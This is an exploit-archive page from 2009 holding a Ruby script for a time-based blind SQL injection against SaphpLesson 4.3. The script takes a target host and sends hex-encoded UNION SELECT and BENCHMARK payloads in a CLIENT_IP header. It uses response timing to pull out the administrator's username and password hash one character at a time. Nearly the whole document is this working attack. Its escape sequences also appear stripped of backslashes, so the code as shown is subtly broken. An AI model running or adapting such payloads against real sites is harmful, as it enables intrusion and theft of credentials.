[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Saphplesson 4.3 Remote Blind SQL Injection Exploit
# Published : 2009-09-16
# Author : Jafer Al Zidjali
# Previous Title : MicroCMS 3.5 (SQL/LFI) Multiple Remote Vulnerabilities
# Next Title : Elite Gaming Ladders 3.2 (platform) SQL Injection Vulnerability


#!/usr/bin/ruby

#=============================================#
#          SaphpLesson v4.3 Exploit           #
#     Blind SQL Injection Vulnerability       #
#---------------------------------------------#
# Date: 21-08-2009                            #
# Discovered & written by: Jafer Al Zidjali   #
# Email: jafer[at]scorpionds.com              #
# Website: www.scorpionds.com                 #
#---------------------------------------------#
# Notes:                                      #
#       1. Author has been notified           #
#       2. A public patch has been released   #
#=============================================#


require "net/http"
require "base64"

intro=[
          "+=============================================+",
          "+          SaphpLesson v4.3 Exploit           +",
          "+     Blind SQL Injection Vulnerability       +",
          "+  Discovered & written by: Jafer Al Zidjali  +",
          "+        Email: jafer[at]scorpionds.com       +",
          "+         Website: www.scorpionds.com         +",
          "+=============================================+"
          ]

def print_intro text
  w="|"
  text.each do |str|
    str.scan(/./) do |c|
        STDOUT.flush
      if w=="|" 
        print "b"+c +w
        w="/"
      elsif w=="/" 
        print "b"+c +w
        w="-"  
      elsif w=="-" 
        print "b"+c +w
        w="\" 
      else
      print "b"+c +w
      w="|"
      end
      sleep 0.04
    end
    print "b "
    puts ""
  end
end

print_intro intro

puts "nEnter host name (e.g. example.com):"
host=gets.chomp

puts "nEnter script path (e.g. /saphplesson/):"
path=gets.chomp


puts "nGetting average response time..."

avgTime=Array.new(5)

5.times do |c|
  s=Time.now
  http = Net::HTTP.new(host, 80)
  resp= http.get(path)
  w=resp.body
  avgTime[c]=Time.now-s
  puts avgTime[c]
end

sum=0
5.times {|c| sum+=avgTime[c]}
avg=sum/5.0
puts "Average response time is: #{avg*3.0}"

puts "nTesting delayed response time..."
delTime=Array.new(5)

5.times do |t|
  delay=1000000*((t+1)*10)
  header={
  "CLIENT_IP" =>  "x27x20x55x4ex49x4fx4ex20x53x45x4cx45x43x54"+
                  "x20x49x46x28x31x3dx31x2cx42x45x4ex43x48x4d"+
                  "x41x52x4bx28#{delay}x2cx63x68x61x72x28x63x68"+
                  "x61x72x28x32x29x29x29x2cx33x34x33x34x29x20x23x20"
  }
  s=Time.now
  http = Net::HTTP.new(host, 80)
  resp= http.get(path,header)
  w=resp.body
  s=Time.now-s
  delTime[t]=delay
  puts "["+(t+1).to_s+"] #{s}"
end

puts "nChoose a delyed response time (it should be > average response time):"
sel=gets.chomp

print "nGetting username length"
ulen=0

20.times do |z|
  header={
  "CLIENT_IP" =>  "x27x20x55x4ex49x4fx4ex20x53x45x4cx45x43x54"+
                  "x20x49x46x28x6cx65x6ex67x74x68x28x28x73x65x6cx65x63x74"+
                  "x20x4dx6fx64x4ex61x6dx65x20x66x72x6fx6dx20x6dx6fx64x72"+
                  "x65x74x6fx72x20x77x68x65x72x65x20x4dx6fx64x49x44x3dx31"+
                  "x29x29x3d#{z+1}x2cx42x45x4ex43x48x4dx41x52x4bx28#{delTime[(sel.to_i)-1]}"+
                  "x2cx63x68x61x72x28x63x68x61x72x28x32x29x29x29x2cx33x34x33x34x29x20x23x20"
  }
  s=Time.now
  http = Net::HTTP.new(host, 80)
  resp= http.get(path,header)
  w=resp.body
  s=Time.now-s
  print "."
    if (s>(avg*3.0))
      ulen=z+1
      break;
    end
  STDOUT.flush
end

puts "nnUsername length: "+ ulen.to_s

puts "nnUsername: "
chars="abcdefghijklmnopqrstuvwxyz0123456789"

ulen.times do |z|
  chars.scan(/./) do |c|
    header={
    "CLIENT_IP" => "x27x20x55x4ex49x4fx4ex20x53x45x4cx45x43"+
    "x54x20x49x46x28x73x75x62x73x74x72x69x6ex67x28x28x73"+
    "x65x6cx65x63x74x20x4dx6fx64x4ex61x6dx65x20x66x72x6f"+
    "x6dx20x6dx6fx64x72x65x74x6fx72x20x77x68x65x72x65x20"+
    "x4dx6fx64x49x44x3dx31x29x2c#{z+1}x2cx31x29x3dx27#{c}x27"+
    "x2cx42x45x4ex43x48x4dx41x52x4bx28#{delTime[(sel.to_i)-1]}"+
    "x2cx63x68x61x72x28x63x68x61x72x28x32x29x29x29x2cx33"+
    "x34x33x34x29x20x23x20"
    }
    s=Time.now
    http = Net::HTTP.new(host, 80)
    resp= http.get(path,header)
    w=resp.body
    s=Time.now-s
    print c
      if (s>(avg*3.0))
        break;
      end
    print "b"
    STDOUT.flush
  end
end

puts "nnPassword hash: "
chars="0123456789abcdef"

32.times do |z|
  chars.scan(/./) do |c|
    header={
    "CLIENT_IP" => "x27x20x55x4ex49x4fx4ex20x53x45x4cx45x43x54"+
    "x20x49x46x28x73x75x62x73x74x72x69x6ex67x28x28x73x65x6c"+
    "x65x63x74x20x4dx6fx64x50x61x73x73x77x6fx72x64x20x66x72"+
    "x6fx6dx20x6dx6fx64x72x65x74x6fx72x20x77x68x65x72x65x20"+
    "x4dx6fx64x49x44x3dx31x29x2c#{z+1}x2cx31x29x3dx27#{c}x27x2c"+
    "x42x45x4ex43x48x4dx41x52x4bx28#{delTime[(sel.to_i)-1]}"+
    "x2cx63x68x61x72x28x63x68x61x72x28x32x29x29x29x2cx33x34"+
    "x33x34x29x20x23x20"
    }
    s=Time.now
    http = Net::HTTP.new(host, 80)
    resp= http.get(path,header)
    w=resp.body
    s=Time.now-s
    print c
      if (s>(avg*3.0))
        break;
      end
    print "b"
    STDOUT.flush
  end
end

# www.Syue.com [2009-09-16]